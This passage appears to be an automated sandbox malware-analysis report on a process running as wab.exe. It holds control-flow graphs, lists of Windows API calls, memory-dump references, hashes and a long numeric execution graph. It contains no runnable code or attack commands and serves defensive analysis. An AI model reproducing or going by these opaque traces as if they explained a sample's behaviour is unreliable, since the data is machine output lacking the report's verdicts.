                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 288 371c4b39-371c4b61 GetModuleHandleExW 289 371c4b86-371c4b8a 288->289 290 371c4b63-371c4b76 GetProcAddress 288->290 293 371c4b8c-371c4b8f FreeLibrary 289->293 294 371c4b95-371c4ba2 call 371c2ada 289->294 291 371c4b78-371c4b83 290->291 292 371c4b85 290->292 291->292 292->289 293->294
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,371C4AEA,?,?,371C4A8A,?,371D2238,0000000C,371C4BBD,00000000,00000000), ref: 371C4B59
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 371C4B6C
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,371C4AEA,?,?,371C4A8A,?,371D2238,0000000C,371C4BBD,00000000,00000000,00000001,371C2082), ref: 371C4B8F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                • Opcode ID: 7ed3eff284890a79a591b51bcd8a66d591af5f93bdff9c916e59d6cccd72c387
                                                                                                                                                • Instruction ID: 362bf91ace624c6055f461d3e0ffde46bd0aba39d32208e8bd12108a9a91214d
                                                                                                                                                • Opcode Fuzzy Hash: 7ed3eff284890a79a591b51bcd8a66d591af5f93bdff9c916e59d6cccd72c387
                                                                                                                                                • Instruction Fuzzy Hash: 36F0A47794010ABFDB01DFD4C80AF9DBFB9EF14761F800168E806B2150DB349A52DB51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 298 371c9492-371c94ef GetConsoleCP 299 371c94f5-371c9511 298->299 300 371c9632-371c9644 call 371c2ada 298->300 302 371c952c-371c953d call 371c7c19 299->302 303 371c9513-371c952a 299->303 309 371c953f-371c9542 302->309 310 371c9563-371c9565 302->310 305 371c9566-371c9575 call 371c79e6 303->305 305->300 314 371c957b-371c959b WideCharToMultiByte 305->314 312 371c9548-371c955a call 371c79e6 309->312 313 371c9609-371c9628 309->313 310->305 312->300 320 371c9560-371c9561 312->320 313->300 314->300 316 371c95a1-371c95b7 WriteFile 314->316 318 371c95b9-371c95ca 316->318 319 371c962a-371c9630 GetLastError 316->319 318->300 321 371c95cc-371c95d0 318->321 319->300 320->314 322 371c95fe-371c9601 321->322 323 371c95d2-371c95f0 WriteFile 321->323 322->299 324 371c9607 322->324 323->319 325 371c95f2-371c95f6 323->325 324->300 325->300 326 371c95f8-371c95fb 325->326 326->322
                                                                                                                                                APIs
                                                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,371C9C07,?,00000000,?,00000000,00000000), ref: 371C94D4
                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 371C9590
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,371C9C07,00000000,?,?,?,?,?,?,?,?,?,371C9C07,?), ref: 371C95AF
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,371C9C07,00000000,?,?,?,?,?,?,?,?,?,371C9C07,?), ref: 371C95E8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite$ByteCharConsoleMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 977765425-0
                                                                                                                                                • Opcode ID: 003eb3273d638d6a509a2d247da1d28d3171aac9a44a299f37e7774b5bc62753
                                                                                                                                                • Instruction ID: 8caac4bd877b40ac7fe6e9a5de54af78d7d75059df360e0a249f8dc8c4b3c56d
                                                                                                                                                • Opcode Fuzzy Hash: 003eb3273d638d6a509a2d247da1d28d3171aac9a44a299f37e7774b5bc62753
                                                                                                                                                • Instruction Fuzzy Hash: 8851BFB2E0024AAFDB00CFE8C895AEEBBB8FF18310F14455AE551F7281D770A951CB61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 327 371c1e89-371c1ec0 lstrlenW call 371c2c40 lstrcatW lstrlenW 330 371c1ed1-371c1edd lstrcatW 327->330 331 371c1ec2-371c1ec5 327->331 331->330 332 371c1ec7-371c1ecd lstrlenW 331->332 332->330
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,371C10DF,?,?,?,00000000), ref: 371C1E9A
                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 371C1EAC
                                                                                                                                                • lstrlenW.KERNEL32(?,?,371C10DF,?,?,?,00000000), ref: 371C1EB3
                                                                                                                                                • lstrlenW.KERNEL32(?,?,371C10DF,?,?,?,00000000), ref: 371C1EC8
                                                                                                                                                • lstrcatW.KERNEL32(?,371C10DF), ref: 371C1ED3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                • Opcode ID: 170ea1750afc5816f0b43156a2f781421488e223cba120da2a8cfdd8a7dfb659
                                                                                                                                                • Instruction ID: 7faa3bda41ac93a1356cbffa5a1cbff6fcd8ae324d9a71554a52336bd3743f64
                                                                                                                                                • Opcode Fuzzy Hash: 170ea1750afc5816f0b43156a2f781421488e223cba120da2a8cfdd8a7dfb659
                                                                                                                                                • Instruction Fuzzy Hash: 6DF054771401117BE722779DAC85E7F7B7CEF86B60F840019F508A3190DB58686293A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,371C190E,?,?,00000000,?,00000000), ref: 371C1643
                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 371C165A
                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,371C190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 371C1661
                                                                                                                                                • lstrcatW.KERNEL32(00001008,?), ref: 371C1686
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrcatlstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1475610065-0
                                                                                                                                                • Opcode ID: 581b6927cbe66c5b069bf2690f19725fb198eb6edd26cadbb64200fe407daa46
                                                                                                                                                • Instruction ID: b43f9411d49b743fb50f461d75a0cf22c8226d1dbbf8c64ef0fe8436c59f9be0
                                                                                                                                                • Opcode Fuzzy Hash: 581b6927cbe66c5b069bf2690f19725fb198eb6edd26cadbb64200fe407daa46
                                                                                                                                                • Instruction Fuzzy Hash: F921DA77900205ABD705DBD4DC81EFE7BB9EF98720F24401AE904FB141DB78A542D7AA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 371C715C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 371C717F
                                                                                                                                                  • Part of subcall function 371C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 371C5702
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 371C71A5
                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 371C71C7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1794362364-0
                                                                                                                                                • Opcode ID: 41d9d386ec96c294a68922dfd8b9a4c3dae17c06506a4ff36053a62a642684ff
                                                                                                                                                • Instruction ID: a0e54d1176b878a5c8dc9708bb1a0967d3f9646eec0d6e33ef7d9a98fb2d9d73
                                                                                                                                                • Opcode Fuzzy Hash: 41d9d386ec96c294a68922dfd8b9a4c3dae17c06506a4ff36053a62a642684ff
                                                                                                                                                • Instruction Fuzzy Hash: 5D0184F76012177F33128AFA5C89D7B6E6EDFD2AA0351012DBD04E7204EFA49C1282B1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,371C1D66,00000000,00000000,?,371C5C88,371C1D66,00000000,00000000,00000000,?,371C5E85,00000006,FlsSetValue), ref: 371C5D13
                                                                                                                                                • GetLastError.KERNEL32(?,371C5C88,371C1D66,00000000,00000000,00000000,?,371C5E85,00000006,FlsSetValue,371CE190,FlsSetValue,00000000,00000364,?,371C5BC8), ref: 371C5D1F
                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,371C5C88,371C1D66,00000000,00000000,00000000,?,371C5E85,00000006,FlsSetValue,371CE190,FlsSetValue,00000000), ref: 371C5D2D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.5979474506.00000000371C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 371C0000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.5979436023.00000000371C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000001.00000002.5979474506.00000000371D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_1_2_371c0000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                • Opcode ID: 43b4b5f97f76c4152afe9e8f62d921cb50aca18b885fc408104b9bfc46ef0245
                                                                                                                                                • Instruction ID: e3f17b8396ed6f1bc3b0605e17250a8c2b96c74077d761d80c4c84b9f3c1cbdb
                                                                                                                                                • Opcode Fuzzy Hash: 43b4b5f97f76c4152afe9e8f62d921cb50aca18b885fc408104b9bfc46ef0245
                                                                                                                                                • Instruction Fuzzy Hash: 75012837651323ABE3128AE88C4AA667B58AF15BF0BA10620F919F7148C724D422CBD0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:7.1%
                                                                                                                                                Dynamic/Decrypted Code Coverage:9.1%
                                                                                                                                                Signature Coverage:1.1%
                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                Total number of Limit Nodes:69
                                                                                                                                                execution_graph 40784 441819 40787 430737 40784->40787 40786 441825 40788 430756 40787->40788 40798 43076d 40787->40798 40789 430774 40788->40789 40790 43075f 40788->40790 40792 43034a memcpy 40789->40792 40801 4169a7 11 API calls 40790->40801 40795 43077e 40792->40795 40793 4307ce 40794 430819 memset 40793->40794 40796 415b2c 11 API calls 40793->40796 40794->40798 40795->40793 40795->40798 40799 4307fa 40795->40799 40797 4307e9 40796->40797 40797->40794 40797->40798 40798->40786 40802 4169a7 11 API calls 40799->40802 40801->40798 40802->40798 37674 442ec6 19 API calls 37850 4152c6 malloc 37851 4152e2 37850->37851 37852 4152ef 37850->37852 37854 416760 11 API calls 37852->37854 37854->37851 37855 4232e8 37856 4232ef 37855->37856 37859 415b2c 37856->37859 37858 423305 37860 415b42 37859->37860 37865 415b46 37859->37865 37861 415b94 37860->37861 37862 415b5a 37860->37862 37860->37865 37866 4438b5 37861->37866 37864 415b79 memcpy 37862->37864 37862->37865 37864->37865 37865->37858 37867 4438d0 37866->37867 37875 4438c9 37866->37875 37880 415378 memcpy memcpy 37867->37880 37875->37865 38523 4466f4 38542 446904 38523->38542 38525 446700 GetModuleHandleA 38528 446710 __set_app_type __p__fmode __p__commode 38525->38528 38527 4467a4 38529 4467ac __setusermatherr 38527->38529 38530 4467b8 38527->38530 38528->38527 38529->38530 38543 4468f0 _controlfp 38530->38543 38532 4467bd _initterm __wgetmainargs _initterm 38534 44681e GetStartupInfoW 38532->38534 38535 446810 38532->38535 38536 446866 GetModuleHandleA 38534->38536 38544 41276d 38536->38544 38540 446896 exit 38541 44689d _cexit 38540->38541 38541->38535 38542->38525 38543->38532 38545 41277d 38544->38545 38587 4044a4 LoadLibraryW 38545->38587 38547 412785 38579 412789 38547->38579 38595 414b81 38547->38595 38550 4127c8 38601 412465 memset ??2@YAPAXI 38550->38601 38552 4127ea 38613 40ac21 38552->38613 38557 412813 38631 40dd07 memset 38557->38631 38558 412827 38636 40db69 memset 38558->38636 38561 412822 38657 4125b6 ??3@YAXPAX 38561->38657 38563 40ada2 _wcsicmp 38564 41283d 38563->38564 38564->38561 38567 412863 CoInitialize 38564->38567 38641 41268e 38564->38641 38661 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38567->38661 38571 41296f 38663 40b633 38571->38663 38574 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38578 412957 38574->38578 38584 4128ca 38574->38584 38578->38561 38579->38540 38579->38541 38580 4128d0 TranslateAcceleratorW 38581 412941 GetMessageW 38580->38581 38580->38584 38581->38578 38581->38580 38582 412909 IsDialogMessageW 38582->38581 38582->38584 38583 4128fd IsDialogMessageW 38583->38581 38583->38582 38584->38580 38584->38582 38584->38583 38585 41292b TranslateMessage DispatchMessageW 38584->38585 38586 41291f IsDialogMessageW 38584->38586 38585->38581 38586->38581 38586->38585 38588 4044cf GetProcAddress 38587->38588 38591 4044f7 38587->38591 38589 4044e8 FreeLibrary 38588->38589 38592 4044df 38588->38592 38590 4044f3 38589->38590 38589->38591 38590->38591 38593 404507 MessageBoxW 38591->38593 38594 40451e 38591->38594 38592->38589 38593->38547 38594->38547 38596 414b8a 38595->38596 38597 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38595->38597 38667 40a804 memset 38596->38667 38597->38550 38600 414b9e GetProcAddress 38600->38597 38603 4124e0 38601->38603 38602 412505 ??2@YAPAXI 38604 41251c 38602->38604 38606 412521 38602->38606 38603->38602 38689 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38604->38689 38678 444722 38606->38678 38612 41259b wcscpy 38612->38552 38694 40b1ab ??3@YAXPAX ??3@YAXPAX 38613->38694 38617 40ad4b 38626 40ad76 38617->38626 38718 40a9ce 38617->38718 38618 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 38624 40ac5c 38618->38624 38620 40ace7 ??3@YAXPAX 38620->38624 38624->38617 38624->38618 38624->38620 38624->38626 38698 40a8d0 38624->38698 38710 4099f4 38624->38710 38625 40a8d0 7 API calls 38625->38626 38695 40aa04 38626->38695 38627 40ada2 38628 40adc9 38627->38628 38629 40adaa 38627->38629 38628->38557 38628->38558 38629->38628 38630 40adb3 _wcsicmp 38629->38630 38630->38628 38630->38629 38723 40dce0 38631->38723 38633 40dd3a GetModuleHandleW 38728 40dba7 38633->38728 38637 40dce0 3 API calls 38636->38637 38638 40db99 38637->38638 38800 40dae1 38638->38800 38814 402f3a 38641->38814 38643 412766 38643->38561 38643->38567 38644 4126d3 _wcsicmp 38645 4126a8 38644->38645 38645->38643 38645->38644 38647 41270a 38645->38647 38849 4125f8 7 API calls 38645->38849 38647->38643 38817 411ac5 38647->38817 38658 4125da 38657->38658 38659 4125f0 38658->38659 38660 4125e6 DeleteObject 38658->38660 38662 40b1ab ??3@YAXPAX ??3@YAXPAX 38659->38662 38660->38659 38661->38574 38662->38571 38664 40b640 38663->38664 38665 40b639 ??3@YAXPAX 38663->38665 38666 40b1ab ??3@YAXPAX ??3@YAXPAX 38664->38666 38665->38664 38666->38579 38668 40a83b GetSystemDirectoryW 38667->38668 38669 40a84c wcscpy 38667->38669 38668->38669 38674 409719 wcslen 38669->38674 38672 40a881 LoadLibraryW 38673 40a886 38672->38673 38673->38597 38673->38600 38675 409724 38674->38675 38676 409739 wcscat LoadLibraryW 38674->38676 38675->38676 38677 40972c wcscat 38675->38677 38676->38672 38676->38673 38677->38676 38679 444732 38678->38679 38680 444728 DeleteObject 38678->38680 38690 409cc3 38679->38690 38680->38679 38682 412551 38683 4010f9 38682->38683 38684 401130 38683->38684 38685 401134 GetModuleHandleW LoadIconW 38684->38685 38686 401107 wcsncat 38684->38686 38687 40a7be 38685->38687 38686->38684 38688 40a7d2 38687->38688 38688->38612 38688->38688 38689->38606 38693 409bfd memset wcscpy 38690->38693 38692 409cdb CreateFontIndirectW 38692->38682 38693->38692 38694->38624 38696 40aa14 38695->38696 38697 40aa0a ??3@YAXPAX 38695->38697 38696->38627 38697->38696 38699 40a8eb 38698->38699 38700 40a8df wcslen 38698->38700 38701 40a906 ??3@YAXPAX 38699->38701 38702 40a90f 38699->38702 38700->38699 38703 40a919 38701->38703 38704 4099f4 3 API calls 38702->38704 38705 40a932 38703->38705 38706 40a929 ??3@YAXPAX 38703->38706 38704->38703 38708 4099f4 3 API calls 38705->38708 38707 40a93e memcpy 38706->38707 38707->38624 38709 40a93d 38708->38709 38709->38707 38711 409a41 38710->38711 38712 4099fb malloc 38710->38712 38711->38624 38714 409a37 38712->38714 38715 409a1c 38712->38715 38714->38624 38716 409a30 ??3@YAXPAX 38715->38716 38717 409a20 memcpy 38715->38717 38716->38714 38717->38716 38719 40a9e7 38718->38719 38720 40a9dc ??3@YAXPAX 38718->38720 38722 4099f4 3 API calls 38719->38722 38721 40a9f2 38720->38721 38721->38625 38722->38721 38747 409bca GetModuleFileNameW 38723->38747 38725 40dce6 wcsrchr 38726 40dcf5 38725->38726 38727 40dcf9 wcscat 38725->38727 38726->38727 38727->38633 38748 44db70 38728->38748 38732 40dbfd 38751 4447d9 38732->38751 38735 40dc34 wcscpy wcscpy 38777 40d6f5 38735->38777 38736 40dc1f wcscpy 38736->38735 38739 40d6f5 3 API calls 38740 40dc73 38739->38740 38741 40d6f5 3 API calls 38740->38741 38742 40dc89 38741->38742 38743 40d6f5 3 API calls 38742->38743 38744 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38743->38744 38783 40da80 38744->38783 38747->38725 38749 40dbb4 memset memset 38748->38749 38750 409bca GetModuleFileNameW 38749->38750 38750->38732 38753 4447f4 38751->38753 38752 40dc1b 38752->38735 38752->38736 38753->38752 38754 444807 ??2@YAPAXI 38753->38754 38755 44481f 38754->38755 38756 444873 _snwprintf 38755->38756 38757 4448ab wcscpy 38755->38757 38790 44474a 8 API calls 38756->38790 38759 4448bb 38757->38759 38791 44474a 8 API calls 38759->38791 38760 4448a7 38760->38757 38760->38759 38762 4448cd 38792 44474a 8 API calls 38762->38792 38764 4448e2 38793 44474a 8 API calls 38764->38793 38766 4448f7 38794 44474a 8 API calls 38766->38794 38768 44490c 38795 44474a 8 API calls 38768->38795 38770 444921 38796 44474a 8 API calls 38770->38796 38772 444936 38797 44474a 8 API calls 38772->38797 38774 44494b 38798 44474a 8 API calls 38774->38798 38776 444960 ??3@YAXPAX 38776->38752 38778 44db70 38777->38778 38779 40d702 memset GetPrivateProfileStringW 38778->38779 38780 40d752 38779->38780 38781 40d75c WritePrivateProfileStringW 38779->38781 38780->38781 38782 40d758 38780->38782 38781->38782 38782->38739 38784 44db70 38783->38784 38785 40da8d memset 38784->38785 38786 40daac LoadStringW 38785->38786 38787 40dac6 38786->38787 38787->38786 38789 40dade 38787->38789 38799 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38787->38799 38789->38561 38790->38760 38791->38762 38792->38764 38793->38766 38794->38768 38795->38770 38796->38772 38797->38774 38798->38776 38799->38787 38810 409b98 GetFileAttributesW 38800->38810 38802 40daea 38803 40db63 38802->38803 38804 40daef wcscpy wcscpy GetPrivateProfileIntW 38802->38804 38803->38563 38811 40d65d GetPrivateProfileStringW 38804->38811 38806 40db3e 38812 40d65d GetPrivateProfileStringW 38806->38812 38808 40db4f 38813 40d65d GetPrivateProfileStringW 38808->38813 38810->38802 38811->38806 38812->38808 38813->38803 38850 40eaff 38814->38850 38818 411ae2 memset 38817->38818 38819 411b8f 38817->38819 38890 409bca GetModuleFileNameW 38818->38890 38831 411a8b 38819->38831 38821 411b0a wcsrchr 38822 411b22 wcscat 38821->38822 38823 411b1f 38821->38823 38891 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38822->38891 38823->38822 38825 411b67 38892 402afb 38825->38892 38829 411b7f 38948 40ea13 SendMessageW memset SendMessageW 38829->38948 38832 402afb 27 API calls 38831->38832 38833 411ac0 38832->38833 38834 4110dc 38833->38834 38835 41113e 38834->38835 38840 4110f0 38834->38840 38973 40969c LoadCursorW SetCursor 38835->38973 38837 411143 38847 40b633 ??3@YAXPAX 38837->38847 38974 4032b4 38837->38974 38992 444a54 38837->38992 38838 4110f7 _wcsicmp 38838->38840 38839 411157 38841 40ada2 _wcsicmp 38839->38841 38840->38835 38840->38838 38995 410c46 10 API calls 38840->38995 38844 411167 38841->38844 38842 4111af 38844->38842 38845 4111a6 qsort 38844->38845 38845->38842 38847->38839 38849->38645 38851 40eb10 38850->38851 38863 40e8e0 38851->38863 38854 40eb6c memcpy memcpy 38861 40ebb7 38854->38861 38855 40ebf2 ??2@YAPAXI ??2@YAPAXI 38857 40ec2e ??2@YAPAXI 38855->38857 38859 40ec65 38855->38859 38856 40d134 16 API calls 38856->38861 38857->38859 38859->38859 38873 40ea7f 38859->38873 38861->38854 38861->38855 38861->38856 38862 402f49 38862->38645 38864 40e8f2 38863->38864 38865 40e8eb ??3@YAXPAX 38863->38865 38866 40e900 38864->38866 38867 40e8f9 ??3@YAXPAX 38864->38867 38865->38864 38868 40e911 38866->38868 38869 40e90a ??3@YAXPAX 38866->38869 38867->38866 38870 40e931 ??2@YAPAXI ??2@YAPAXI 38868->38870 38871 40e921 ??3@YAXPAX 38868->38871 38872 40e92a ??3@YAXPAX 38868->38872 38869->38868 38870->38854 38871->38872 38872->38870 38874 40aa04 ??3@YAXPAX 38873->38874 38875 40ea88 38874->38875 38876 40aa04 ??3@YAXPAX 38875->38876 38877 40ea90 38876->38877 38878 40aa04 ??3@YAXPAX 38877->38878 38879 40ea98 38878->38879 38880 40aa04 ??3@YAXPAX 38879->38880 38881 40eaa0 38880->38881 38882 40a9ce 4 API calls 38881->38882 38883 40eab3 38882->38883 38884 40a9ce 4 API calls 38883->38884 38885 40eabd 38884->38885 38886 40a9ce 4 API calls 38885->38886 38887 40eac7 38886->38887 38888 40a9ce 4 API calls 38887->38888 38889 40ead1 38888->38889 38889->38862 38890->38821 38891->38825 38949 40b2cc 38892->38949 38894 402b0a 38895 40b2cc 27 API calls 38894->38895 38896 402b23 38895->38896 38897 40b2cc 27 API calls 38896->38897 38898 402b3a 38897->38898 38899 40b2cc 27 API calls 38898->38899 38900 402b54 38899->38900 38901 40b2cc 27 API calls 38900->38901 38902 402b6b 38901->38902 38903 40b2cc 27 API calls 38902->38903 38904 402b82 38903->38904 38905 40b2cc 27 API calls 38904->38905 38906 402b99 38905->38906 38907 40b2cc 27 API calls 38906->38907 38908 402bb0 38907->38908 38909 40b2cc 27 API calls 38908->38909 38910 402bc7 38909->38910 38911 40b2cc 27 API calls 38910->38911 38912 402bde 38911->38912 38913 40b2cc 27 API calls 38912->38913 38914 402bf5 38913->38914 38915 40b2cc 27 API calls 38914->38915 38916 402c0c 38915->38916 38917 40b2cc 27 API calls 38916->38917 38918 402c23 38917->38918 38919 40b2cc 27 API calls 38918->38919 38920 402c3a 38919->38920 38921 40b2cc 27 API calls 38920->38921 38922 402c51 38921->38922 38923 40b2cc 27 API calls 38922->38923 38924 402c68 38923->38924 38925 40b2cc 27 API calls 38924->38925 38926 402c7f 38925->38926 38927 40b2cc 27 API calls 38926->38927 38928 402c99 38927->38928 38929 40b2cc 27 API calls 38928->38929 38930 402cb3 38929->38930 38931 40b2cc 27 API calls 38930->38931 38932 402cd5 38931->38932 38933 40b2cc 27 API calls 38932->38933 38934 402cf0 38933->38934 38935 40b2cc 27 API calls 38934->38935 38936 402d0b 38935->38936 38937 40b2cc 27 API calls 38936->38937 38938 402d26 38937->38938 38939 40b2cc 27 API calls 38938->38939 38940 402d3e 38939->38940 38941 40b2cc 27 API calls 38940->38941 38942 402d59 38941->38942 38943 40b2cc 27 API calls 38942->38943 38944 402d78 38943->38944 38945 40b2cc 27 API calls 38944->38945 38946 402d93 38945->38946 38947 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38946->38947 38947->38829 38948->38819 38952 40b58d 38949->38952 38951 40b2d1 38951->38894 38953 40b5a4 GetModuleHandleW FindResourceW 38952->38953 38954 40b62e 38952->38954 38955 40b5c2 LoadResource 38953->38955 38957 40b5e7 38953->38957 38954->38951 38956 40b5d0 SizeofResource LockResource 38955->38956 38955->38957 38956->38957 38957->38954 38965 40afcf 38957->38965 38959 40b608 memcpy 38968 40b4d3 memcpy 38959->38968 38961 40b61e 38969 40b3c1 18 API calls 38961->38969 38963 40b626 38970 40b04b 38963->38970 38966 40b04b ??3@YAXPAX 38965->38966 38967 40afd7 ??2@YAPAXI 38966->38967 38967->38959 38968->38961 38969->38963 38971 40b051 ??3@YAXPAX 38970->38971 38972 40b05f 38970->38972 38971->38972 38972->38954 38973->38837 38975 4032c4 38974->38975 38976 40b633 ??3@YAXPAX 38975->38976 38977 403316 38976->38977 38996 44553b 38977->38996 38981 403480 39192 40368c 15 API calls 38981->39192 38983 403489 38984 40b633 ??3@YAXPAX 38983->38984 38985 403495 38984->38985 38985->38839 38986 4033a9 memset memcpy 38987 4033ec wcscmp 38986->38987 38988 40333c 38986->38988 38987->38988 38988->38981 38988->38986 38988->38987 39190 4028e7 11 API calls 38988->39190 39191 40f508 6 API calls 38988->39191 38990 403421 _wcsicmp 38990->38988 38993 444a64 FreeLibrary 38992->38993 38994 444a83 38992->38994 38993->38994 38994->38839 38995->38840 38997 445548 38996->38997 38998 445599 38997->38998 39193 40c768 38997->39193 38999 4455a8 memset 38998->38999 39006 4457f2 38998->39006 39276 403988 38999->39276 39009 445854 39006->39009 39378 403e2d memset memset memset memset memset 39006->39378 39007 4458bb memset memset 39013 414c2e 16 API calls 39007->39013 39059 4458aa 39009->39059 39401 403c9c memset memset memset memset memset 39009->39401 39011 44595e memset memset 39019 414c2e 16 API calls 39011->39019 39012 4455e5 39016 445672 39012->39016 39022 44560f 39012->39022 39014 4458f9 39013->39014 39020 40b2cc 27 API calls 39014->39020 39287 403fbe memset memset memset memset memset 39016->39287 39017 445a00 memset memset 39424 414c2e 39017->39424 39018 445b22 39024 445bca 39018->39024 39025 445b38 memset memset memset 39018->39025 39029 44599c 39019->39029 39030 445909 